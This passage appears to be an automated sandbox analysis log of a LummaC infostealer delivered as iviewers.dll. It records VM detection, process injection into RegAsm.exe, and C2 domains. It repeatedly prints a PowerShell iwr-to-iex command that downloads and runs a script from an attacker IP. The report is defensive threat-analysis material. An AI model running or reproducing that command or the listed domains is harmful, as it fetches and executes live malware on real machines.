            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: loaddll32.exe, 00000000.00000002.1679756865.0000000004CEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0
            Source: rundll32.exe, 00000006.00000002.1590146059.0000000006F2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: RegAsm.exe, 00000029.00000002.1806244051.0000000001065000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW({
            Source: loaddll32.exe, 00000000.00000002.1679756865.0000000004CB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\q
            Source: regsvr32.exe, 00000004.00000002.1626689881.0000000006BA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: RegAsm.exe, RegAsm.exe, 00000029.00000002.1806244051.000000000109F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: powershell.exe, 0000001B.00000002.1670598769.0000000007028000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllh
            Source: rundll32.exe, 00000005.00000002.1635048001.00000000034FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\j
            Source: RegAsm.exe, 0000001F.00000002.1586661294.0000000000C73000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
            Source: rundll32.exe, 00000006.00000002.1590146059.0000000006F2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\^
            Source: RegAsm.exe, 00000023.00000002.1754899784.0000000001145000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW04
            Source: powershell.exe, 0000000D.00000002.1615989853.0000000007AB9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1579325198.00000000079DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: rundll32.exe, 00000005.00000002.1635048001.00000000034FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}r
            Source: powershell.exe, 0000000F.00000002.1629065195.0000000006D95000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllhh
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0043C1F0 LdrInitializeThunk,31_2_0043C1F0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\loaddll32.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            .NET source code references suspicious native API functions
            Source: 13.2.powershell.exe.592a7f0.2.raw.unpack, Engineers.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
            Source: 13.2.powershell.exe.592a7f0.2.raw.unpack, Engineers.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
            Source: 13.2.powershell.exe.592a7f0.2.raw.unpack, Engineers.csReference to suspicious API methods: VirtualAllocEx(processInfo.ProcessHandle, num3, length, 12288, 64)
            Compiles code for process injection (via .Net compiler)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Local\Temp\rcv5n2si\rcv5n2si.0.csJump to dropped file
            Injects a PE file into a foreign processes
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
            LummaC encrypted strings found
            Source: powershell.exe, 0000000D.00000002.1589335298.00000000058FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: rapeflowwj.lat
            Source: powershell.exe, 0000000D.00000002.1589335298.00000000058FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: crosshuaht.lat
            Source: powershell.exe, 0000000D.00000002.1589335298.00000000058FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sustainskelet.lat
            Source: powershell.exe, 0000000D.00000002.1589335298.00000000058FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: aspecteirs.lat
            Source: powershell.exe, 0000000D.00000002.1589335298.00000000058FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: energyaffai.lat
            Source: powershell.exe, 0000000D.00000002.1589335298.00000000058FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: necklacebudi.lat
            Source: powershell.exe, 0000000D.00000002.1589335298.00000000058FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: discokeyus.lat
            Source: powershell.exe, 0000000D.00000002.1589335298.00000000058FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: grannyejh.lat
            Source: powershell.exe, 0000000D.00000002.1589335298.00000000058FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: volcanoyev.click
            Writes to foreign memory regions
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 440000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 443000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 452000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 754008
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 440000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 443000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 452000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 673008
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 440000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 443000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 452000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: CCA008
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 440000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 443000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 452000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: AE1008
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ceo01y5g\ceo01y5g.cmdline"Jump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\iviewers.dll",#1Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\snjgawjs\snjgawjs.cmdline"Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex"Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zhytdsxg\zhytdsxg.cmdline"Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex"Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\shgzzqqc\shgzzqqc.cmdline"Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex"Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES61E6.tmp" "c:\Users\user\AppData\Local\Temp\snjgawjs\CSC3AE61AA7D3846E6BE99F6A92C13265.TMP"Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES63AB.tmp" "c:\Users\user\AppData\Local\Temp\zhytdsxg\CSC3C5171C2F0D346F28B74AD359FA9163B.TMP"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ljtzeyvh\ljtzeyvh.cmdline"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tkky4heb\tkky4heb.cmdline"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6C65.tmp" "c:\Users\user\AppData\Local\Temp\shgzzqqc\CSC104EE36483A04EF7B85B7643AE3701F.TMP"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pejlabp5\pejlabp5.cmdline"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7946.tmp" "c:\Users\user\AppData\Local\Temp\ceo01y5g\CSC7CE9657BAB74596AF1C43C93161D.TMP"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7C53.tmp" "c:\Users\user\AppData\Local\Temp\ljtzeyvh\CSC85D6A8B45C74774986DA7C6AC7246BE.TMP"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7CE0.tmp" "c:\Users\user\AppData\Local\Temp\tkky4heb\CSC9A9BD2EDD89B4875B92A5CEF8AA9766.TMP"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rcv5n2si\rcv5n2si.cmdline"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES83D5.tmp" "c:\Users\user\AppData\Local\Temp\pejlabp5\CSCDF701219C1C48818E6CA425D3E8BAB7.TMP"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9337.tmp" "c:\Users\user\AppData\Local\Temp\rcv5n2si\CSC2F361128F45F4F0A9752D6455878CB1F.TMP"
            Source: C:\Windows\System32\loaddll32.exeQueries volume information: C:\Users\user\Desktop\iviewers.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\loaddll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\loaddll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\Users\user\Desktop\iviewers.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\Desktop\iviewers.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\Desktop\iviewers.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
